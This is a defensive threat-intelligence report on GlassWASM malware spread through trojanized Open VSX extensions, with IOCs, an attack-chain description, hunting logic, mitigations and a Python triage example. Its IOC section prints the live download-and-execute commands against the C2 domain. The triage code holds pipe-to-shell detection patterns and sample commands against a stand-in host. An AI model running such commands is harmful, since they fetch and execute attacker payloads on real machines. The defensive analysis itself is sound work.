GlassWASM: WebAssembly Malware Found in Trojanized Open VSX Extensions
Threat researchers discovered GlassWASM, a WebAssembly-based malware distributed via trojanized extensions on the Open VSX marketplace. The malware uses ChaCha20 encryption to evade static analysis and leverages the Solana blockchain as a resilient C2 dead-drop to retrieve and execute OS-specific second-stage payloads via Node.js.
Indicators of Compromise
| Type | Indicator | Description |
|---|---|---|
| domain | dodod[.]lat | Resolved C2 / second-stage host retrieved from the Solana blockchain memo. |
| md5 | 4e143876eeaf5e767a9971f603b0f13c | WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm). |
| md5 | b262b8d2ac2f0ab3c78251db44ecf3ac | Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix. |
| md5 | f595fb7867beb76b4deab53fa328e0a2 | Malicious extension package: exargd.vsblack-0.0.1.vsix. |
| sha1 | 824e601b599b9ad97ee12f0b3a72efd20ba59d47 | Malicious extension package: exargd.vsblack-0.0.1.vsix. |
| sha1 | 8ebac142e34a20c297d3ccaca7ee5d9ddd24fed4 | WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm). |
| sha1 | c0ed7d575fe8085e942898c9a26f15992c895ba9 | Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix. |
| sha256 | 1e283327ad048bea39f4a8501770858a20f3555e87fe3e202274f2e87f8a3c25 | Malicious extension package: exargd.vsblack-0.0.1.vsix. |
| sha256 | 3aa31999398e7f80231c03d7137ffdb554a84b83dbcffc59ce16c9a65f9e5d58 | Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix. |
| sha256 | 558b4f1d9a263c13756ab0126c09dd080c85ba405b29488e1c4e6aa68b554f1f | WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm). |
| url | hxxps://dodod[.]lat/darwin/i/_ | macOS second-stage download URL. |
| url | hxxps://dodod[.]lat/linux/i/_ | Linux second-stage download URL. |
| url | hxxps://dodod[.]lat/win32/i/_ | Windows second-stage download URL. |
What Happened
Attackers uploaded fake versions of popular developer tools to the Open VSX marketplace, which is used by many code editors. When installed, these fake tools run hidden malicious code written in WebAssembly. This code secretly checks the Solana cryptocurrency network for instructions on what to do next, making it very hard to block. It then downloads and runs additional malware tailored to the victim's operating system (Windows, Mac, or Linux). Developers using alternative code editors like VSCodium or Cursor should check their installed extensions and remove the malicious ones.
Key Takeaways
- Trojanized VS Code extensions on the Open VSX marketplace deliver evasive WebAssembly (WASM) malware.
- The WASM payload uses ChaCha20 encryption to hide all strings and network indicators from static analysis.
- The malware uses the Solana blockchain as a takedown-resistant C2 dead-drop, reading instructions from the SPL Memo field.
- It executes OS-specific second-stage payloads via Node.js child_process using 'curl | bash' or 'irm | iex'.
- The campaign is attributed to the GlassWorm threat actor, marking a pivot to binary loading for obfuscation.
Affected Systems
- VS Code forks using Open VSX (VSCodium, Cursor, Windsurf, Gitpod)
- Node.js environments
- Windows
- macOS
- Linux
Attack Chain
The attack begins with the victim installing a trojanized extension from the Open VSX registry. Upon activation, a JavaScript loader instantiates an obfuscated WebAssembly (WASM) module. The WASM module decrypts its strings in memory using ChaCha20 and queries the Solana blockchain to read an attacker-controlled SPL Memo field. This memo provides the C2 domain, which the malware uses to construct and execute an OS-specific download-and-execute command via Node's child_process, fetching a second-stage payload.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide explicit detection rules but outlines behavioral detection strategies, such as monitoring Node.js processes spawning shells or making unexpected JSON-RPC calls to Solana endpoints.
Detection Engineering Assessment
- EDR Visibility: High — EDRs have strong visibility into process creation events, specifically Node.js spawning bash, sh, curl, or powershell with hidden windows.
- Network Visibility: Medium — While the C2 payload retrieval is over HTTPS and the Solana RPC calls blend with legitimate traffic, the specific JSON-RPC payload structures and the C2 domain dodod.lat can be detected with SSL inspection or DNS logging.
- Detection Difficulty: Moderate — Static analysis is difficult due to WASM and ChaCha20 obfuscation, but behavioral detection of the execution chain (Node spawning shells) is highly reliable.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon Event ID 1)
- DNS Query Logs
- Network Connection Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Node.js processes spawning shell interpreters (bash, sh, powershell) or downloaders (curl) may indicate malicious extension activity. | Process Creation Logs (EDR/Sysmon) | Execution | Medium (Some legitimate Node.js build scripts or tools may spawn shells, but 'curl \| bash' …) |
| Unexpected outbound JSON-RPC traffic to Solana mainnet endpoints from developer workstations may indicate blockchain-based C2 resolution. | Network/Proxy Logs | Command and Control | Medium (Legitimate Web3 developers will have this traffic, but it is anomalous for general developers) |
Control Gaps
- Static AV scanning of WASM files
- Trust in third-party extension registries (Open VSX)
Key Behavioral Indicators
- Node.js spawning processes with windowsHide: true
- WASM modules importing gojs.syscall/js.* (the import namespace used by Go-compiled WebAssembly)
- Process command lines containing 'curl -fsSL ... | bash' or 'irm ... | iex'
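The process-tree and Solana RPC hunts above, as an added triage example (not code from the report or its source). It scores constructed Sysmon-style process events and connection records; the extension-host basenames, the RPC host set and the JSON-RPC method names are assumptions to adapt to your own telemetry.

```python
import re
# Added triage example, not from the report. Assumed parent basenames that host extension code:
# plain Node.js and the VS Code fork binaries (their extension host is a child of the editor process).
EXTENSION_HOSTS = {"node", "codium", "vscodium", "cursor", "windsurf"}
SHELLS_AND_DOWNLOADERS = {"bash", "sh", "zsh", "cmd", "powershell", "pwsh", "curl"}
# The two download-and-execute shapes the report names: 'curl ... | bash' and 'irm ... | iex'.
PIPE_TO_INTERPRETER = re.compile(
    r"curl\s[^|]*\|\s*(?:ba)?sh\b|\b(?:irm|Invoke-RestMethod)\s[^|]*\|\s*(?:iex|Invoke-Expression)\b", re.IGNORECASE)
# Assumed RPC host set and the JSON-RPC methods a wallet-memo poll needs (bodies need SSL inspection).
SOLANA_RPC_HOSTS = {"api.mainnet-beta.solana.com"}
DEAD_DROP_METHODS = {"getSignaturesForAddress", "getTransaction"}

def _basename(path):
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def triage_process_event(event):
    """Severity for one process-creation record (Sysmon ID 1 / 4688 fields): 'high', 'medium' or None."""
    parent, child = _basename(event.get("parent_image", "")), _basename(event.get("image", ""))
    if parent not in EXTENSION_HOSTS or child not in SHELLS_AND_DOWNLOADERS:
        return None
    # A host spawning a shell is only medium (build scripts do it); the piped download-and-execute is what marks GlassWASM.
    return "high" if PIPE_TO_INTERPRETER.search(event.get("command_line", "")) else "medium"

def is_solana_dead_drop_poll(conn):
    """True for a connection to a Solana RPC host; with a decrypted JSON-RPC body, also require a wallet-history method."""
    if conn.get("dest_host", "").lower() not in SOLANA_RPC_HOSTS:
        return False
    body = conn.get("json_rpc")
    return body is None or body.get("method") in DEAD_DROP_METHODS

# Constructed sample telemetry; c2.example.invalid stands in for the real C2 domain.
SAMPLE_PROCESS_EVENTS = [
    {"parent_image": "/usr/bin/node", "image": "/bin/sh",
     "command_line": 'sh -c "curl -fsSL https://c2.example.invalid/linux/i/_ | bash"'},
    {"parent_image": r"C:\Programs\cursor\Cursor.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -Command "irm https://c2.example.invalid/win32/i/_ | iex"'},
    {"parent_image": "/usr/bin/node", "image": "/bin/sh", "command_line": "sh -c 'npm run build'"},
    {"parent_image": "/usr/bin/bash", "image": "/usr/bin/curl", "command_line": "curl -sS https://example.org/ | sh"},
]
SAMPLE_CONNECTIONS = [
    {"dest_host": "api.mainnet-beta.solana.com", "json_rpc": {"method": "getSignaturesForAddress"}},
    {"dest_host": "api.mainnet-beta.solana.com", "json_rpc": {"method": "getHealth"}},
    {"dest_host": "registry.npmjs.org", "json_rpc": None},
]

def run_triage():
    """Severities and RPC flags for the sample telemetry, in input order."""
    return ([triage_process_event(e) for e in SAMPLE_PROCESS_EVENTS],
            [is_solana_dead_drop_poll(c) for c in SAMPLE_CONNECTIONS])
```

Only the first two process events reach 'high'; the Node-spawned build shell stays 'medium', and a bash-spawned curl is ignored because its parent is not an extension host.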
False Positive Assessment
- Low for the specific IOCs (domain, hashes). Medium for behavioral hunts (Node.js spawning shells), as some legitimate developer tools may exhibit similar process trees.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Search for and remove the trojanized extensions exargd.vsblack (0.0.1) and noellee-doc.flint-debug (0.1.1) from VS Code forks (VSCodium, Cursor, Windsurf, Gitpod).
- Block the C2 domain dodod.lat and the associated download URLs at the network perimeter.
- If an infection is confirmed, consider rotating developer, CI, cloud, and npm credentials reachable from the affected environment.
Infrastructure Hardening
- Evaluate whether to restrict outbound access to cryptocurrency RPC endpoints (e.g., api.mainnet.solana.com) for non-Web3 developer workstations.
- Consider implementing strict extension allowlists for VS Code and its forks to prevent the installation of unverified or impersonated extensions.
User Protection
- Ensure EDR solutions are configured to monitor and alert on suspicious child processes spawned by Node.js.
- If applicable, incorporate WASM-aware analysis tools (like wasm2c or wabt) into CI/CD and package-vetting pipelines.
Security Awareness
- Educate developers on the risks of third-party extension registries like Open VSX and the importance of verifying publisher authenticity.
MITRE ATT&CK Mapping
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1140 - Deobfuscate/Decode Files or Information
- T1102.001 - Web Service: Dead Drop Resolver
- T1059.007 - Command and Scripting Interpreter: JavaScript
- T1564.003 - Hide Artifacts: Hidden Window
Additional IOCs
- File Hashes:
  - 8ebac142e34a20c297d3ccaca7ee5d9ddd24fed4 (SHA1) - WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm).
  - 4e143876eeaf5e767a9971f603b0f13c (MD5) - WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm).
  - c0ed7d575fe8085e942898c9a26f15992c895ba9 (SHA1) - Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix.
  - b262b8d2ac2f0ab3c78251db44ecf3ac (MD5) - Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix.
  - 824e601b599b9ad97ee12f0b3a72efd20ba59d47 (SHA1) - Malicious extension package: exargd.vsblack-0.0.1.vsix.
  - f595fb7867beb76b4deab53fa328e0a2 (MD5) - Malicious extension package: exargd.vsblack-0.0.1.vsix.
- File Paths:
  - snqpkebiwrxmoivl.wasm - WebAssembly payload filename.
  - orybbbdsuqmaapel.wasm - WebAssembly payload filename.
- Command Lines:
  - Purpose: Download and execute second-stage payload on Unix/macOS | Tools: curl, bash, node | Stage: Execution | `curl -fsSL https://dodod.lat/linux/i/_ | bash`
  - Purpose: Download and execute second-stage payload on Windows | Tools: powershell, node | Stage: Execution | `powershell -Command "irm https://dodod.lat/win32/i/_ | iex"`
- Other:
  - 6ExrZayPZzMMSnszc42cH81DpuKT8FhCX9H6Sesn6rpz - Attacker-controlled Solana wallet polled for instructions.
  - MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr - SPL Memo program v2 parsed for attacker payload.
  - Memo1UhkJRfHyvLMcVucJwxXeuD728EqVDDwQDxFM - SPL Memo program v1 parsed for attacker payload.
  - github.com/zaitoona43 - Threat actor GitHub account used to publish malicious extensions.
  - vscode/exargd/vsblack (version 0.0.1) - Malicious Open VSX package namespace and version.
  - vscode/noellee-doc/flint-debug (version 0.1.1) - Malicious Open VSX package namespace and version.